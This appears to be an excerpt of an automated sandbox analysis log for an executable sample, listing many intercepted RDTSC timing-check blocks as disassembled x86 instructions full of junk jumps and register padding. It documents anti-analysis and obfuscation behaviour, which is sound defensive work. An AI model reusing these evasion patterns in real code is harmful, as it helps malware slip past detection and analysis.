Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00B13 second address: 6F00B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+04h], eax 0x0000000a pushad 0x0000000b jmp 00007FFA692CA427h 0x00000010 mov bl, ch 0x00000012 popad 0x00000013 lea eax, dword ptr [ebx+78h] 0x00000016 pushad 0x00000017 mov ecx, edx 0x00000019 jmp 00007FFA692CA41Dh 0x0000001e popad 0x0000001f push 00000001h 0x00000021 jmp 00007FFA692CA41Eh 0x00000026 nop 0x00000027 pushad 0x00000028 mov cx, DF2Dh 0x0000002c mov cx, 4129h 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FFA692CA421h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00B7D second address: 6F00B92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00B92 second address: 6F00BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3E942172h 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00BA6 second address: 6F00BAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00BAC second address: 6F00C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FFA692CA425h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 jmp 00007FFA692CA427h 0x00000016 nop 0x00000017 jmp 00007FFA692CA426h 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ebx, 4953C5F4h 0x00000023 pushfd 0x00000024 jmp 00007FFA692CA41Dh 0x00000029 and eax, 21561FB6h 0x0000002f jmp 00007FFA692CA421h 0x00000034 popfd 0x00000035 popad 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00C30 second address: 6F00C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00C36 second address: 6F00C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA421h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00C73 second address: 6F00C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00C85 second address: 6F00C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA692CA41Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00C9B second address: 6F00D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FFA68B945C6h 0x00000010 js 00007FFAD75C2FADh 0x00000016 jmp 00007FFA68B945C0h 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e pushad 0x0000001f call 00007FFA68B945BEh 0x00000024 mov si, B921h 0x00000028 pop esi 0x00000029 pushfd 0x0000002a jmp 00007FFA68B945C7h 0x0000002f or ax, 6FCEh 0x00000034 jmp 00007FFA68B945C9h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+08h], eax 0x0000003e jmp 00007FFA68B945BEh 0x00000043 lea eax, dword ptr [ebx+70h] 0x00000046 jmp 00007FFA68B945C0h 0x0000004b push 00000001h 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFA68B945C7h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00D66 second address: 6F00DCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA41Fh 0x00000008 pushfd 0x00000009 jmp 00007FFA692CA428h 0x0000000e sbb ax, 6038h 0x00000013 jmp 00007FFA692CA41Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d pushad 0x0000001e call 00007FFA692CA424h 0x00000023 mov ax, 12F1h 0x00000027 pop ecx 0x00000028 mov edi, 6D9DE262h 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00DCD second address: 6F00DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00DD1 second address: 6F00DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00DE6 second address: 6F00E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FFA68B945BEh 0x0000000f lea eax, dword ptr [ebp-18h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA68B945C7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00E26 second address: 6F00E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA692CA41Fh 0x00000009 jmp 00007FFA692CA423h 0x0000000e popfd 0x0000000f call 00007FFA692CA428h 0x00000014 pop esi 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 jmp 00007FFA692CA41Eh 0x0000001e mov dword ptr [esp], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFA692CA427h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00E94 second address: 6F00EC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA68B945BFh 0x00000009 sbb cx, 22EEh 0x0000000e jmp 00007FFA68B945C9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00F24 second address: 6F00F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA692CA41Fh 0x00000008 pop esi 0x00000009 mov bx, 8B6Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test edi, edi 0x00000012 jmp 00007FFA692CA41Bh 0x00000017 js 00007FFAD7CF8B7Ah 0x0000001d pushad 0x0000001e push ecx 0x0000001f mov cx, dx 0x00000022 pop edx 0x00000023 popad 0x00000024 mov eax, dword ptr [ebp-14h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a movsx ebx, cx 0x0000002d mov edx, eax 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00F64 second address: 6F01015 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 407970DAh 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop eax 0x00000013 mov edi, 5B52B718h 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007FFA68B945C1h 0x0000001f adc si, 8A06h 0x00000024 jmp 00007FFA68B945C1h 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esi+0Ch], eax 0x0000002e pushad 0x0000002f mov al, 72h 0x00000031 pushfd 0x00000032 jmp 00007FFA68B945C9h 0x00000037 xor eax, 7BAD9216h 0x0000003d jmp 00007FFA68B945C1h 0x00000042 popfd 0x00000043 popad 0x00000044 mov edx, 759B06ECh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FFA68B945C3h 0x00000052 jmp 00007FFA68B945C3h 0x00000057 popfd 0x00000058 mov si, 375Fh 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01015 second address: 6F01062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA425h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FFA692CA427h 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFA692CA425h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01062 second address: 6F01072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01072 second address: 6F010A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c jmp 00007FFA692CA426h 0x00000011 test eax, eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov al, 4Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F010A1 second address: 6F010F7 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 38F2E72Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movsx edx, ax 0x0000000c popad 0x0000000d jne 00007FFAD75C2BE4h 0x00000013 pushad 0x00000014 mov dh, ch 0x00000016 pushfd 0x00000017 jmp 00007FFA68B945BFh 0x0000001c sub ah, FFFFFFDEh 0x0000001f jmp 00007FFA68B945C9h 0x00000024 popfd 0x00000025 popad 0x00000026 mov edx, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FFA68B945BDh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F010F7 second address: 6F01114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01114 second address: 6F01118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01118 second address: 6F0111C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0111C second address: 6F01122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01122 second address: 6F01140 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA422h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01140 second address: 6F01144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01144 second address: 6F0114A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0114A second address: 6F011BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA68B945C1h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+04h] 0x0000000f jmp 00007FFA68B945C7h 0x00000014 mov dword ptr [edx+04h], eax 0x00000017 pushad 0x00000018 mov ax, B74Bh 0x0000001c jmp 00007FFA68B945C0h 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+08h] 0x00000025 pushad 0x00000026 mov al, 23h 0x00000028 movsx edx, si 0x0000002b popad 0x0000002c mov dword ptr [edx+08h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007FFA68B945C7h 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F011BE second address: 6F011C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F011C4 second address: 6F011C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F011C8 second address: 6F01268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+0Ch] 0x0000000b jmp 00007FFA692CA423h 0x00000010 mov dword ptr [edx+0Ch], eax 0x00000013 pushad 0x00000014 mov ebx, eax 0x00000016 movzx eax, bx 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+10h] 0x0000001d jmp 00007FFA692CA423h 0x00000022 mov dword ptr [edx+10h], eax 0x00000025 jmp 00007FFA692CA426h 0x0000002a mov eax, dword ptr [esi+14h] 0x0000002d pushad 0x0000002e call 00007FFA692CA41Eh 0x00000033 mov si, 40A1h 0x00000037 pop ecx 0x00000038 jmp 00007FFA692CA427h 0x0000003d popad 0x0000003e mov dword ptr [edx+14h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FFA692CA425h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01268 second address: 6F0128C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, DF5Eh 0x00000013 mov dx, 936Ah 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0139B second address: 6F013A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F013A1 second address: 6F0140F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFA68B945BEh 0x0000000b and esi, 678063F8h 0x00000011 jmp 00007FFA68B945BBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ecx, dword ptr [esi+2Ch] 0x0000001d pushad 0x0000001e mov dx, ax 0x00000021 pushfd 0x00000022 jmp 00007FFA68B945C0h 0x00000027 sbb eax, 323D3E58h 0x0000002d jmp 00007FFA68B945BBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [edx+2Ch], ecx 0x00000037 pushad 0x00000038 call 00007FFA68B945C4h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0140F second address: 6F01439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FFA692CA421h 0x0000000a popad 0x0000000b mov ax, word ptr [esi+30h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFA692CA41Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01439 second address: 6F01459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dh, 7Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01459 second address: 6F0145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0145E second address: 6F01474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, bx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01474 second address: 6F014CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d jmp 00007FFA692CA420h 0x00000012 mov eax, dword ptr [esi+34h] 0x00000015 jmp 00007FFA692CA420h 0x0000001a mov dword ptr [edx+34h], eax 0x0000001d jmp 00007FFA692CA420h 0x00000022 test ecx, 00000700h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov eax, edi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F014CA second address: 6F01537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFA68B945C1h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FFAD75C27EBh 0x00000012 jmp 00007FFA68B945C7h 0x00000017 or dword ptr [edx+38h], FFFFFFFFh 0x0000001b jmp 00007FFA68B945C6h 0x00000020 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000024 jmp 00007FFA68B945C0h 0x00000029 or dword ptr [edx+40h], FFFFFFFFh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01537 second address: 6F0153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0153B second address: 6F01558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01558 second address: 6F01568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01568 second address: 6F01591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F01591 second address: 6F015AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4E085942h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e pushad 0x0000000f mov cx, 21A7h 0x00000013 popad 0x00000014 leave 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov eax, edx 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F40C8D second address: 6F40C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F40C93 second address: 6F40CA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx eax, di 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EF0776 second address: 6EF077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EF077A second address: 6EF0780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EF0780 second address: 6EF0812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 mov cl, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FFA68B945C4h 0x00000010 push eax 0x00000011 pushad 0x00000012 call 00007FFA68B945C1h 0x00000017 jmp 00007FFA68B945C0h 0x0000001c pop eax 0x0000001d pushad 0x0000001e mov eax, ebx 0x00000020 popad 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FFA68B945C5h 0x0000002a add ch, 00000006h 0x0000002d jmp 00007FFA68B945C1h 0x00000032 popfd 0x00000033 mov edx, esi 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FFA68B945C4h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EF0812 second address: 6EF0821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E90053 second address: 6E900BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFA68B945BEh 0x0000000f push eax 0x00000010 jmp 00007FFA68B945BBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007FFA68B945BBh 0x0000001e sbb ax, A07Eh 0x00000023 jmp 00007FFA68B945C9h 0x00000028 popfd 0x00000029 pop esi 0x0000002a movsx edx, cx 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E900BE second address: 6E900C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E900C2 second address: 6E900C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E900C8 second address: 6E900F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA692CA41Ah 0x00000009 jmp 00007FFA692CA425h 0x0000000e popfd 0x0000000f movzx ecx, di 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pop ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E900F8 second address: 6E900FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E906F5 second address: 6E906FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C7B2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E90AA5 second address: 6E90ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 mov si, FF29h 0x0000000c push esi 0x0000000d push edi 0x0000000e pop esi 0x0000000f pop ebx 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FFA68B945BCh 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E90ACD second address: 6E90AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6E90AD1 second address: 6E90AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6EE09C0 second address: 6EE09C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
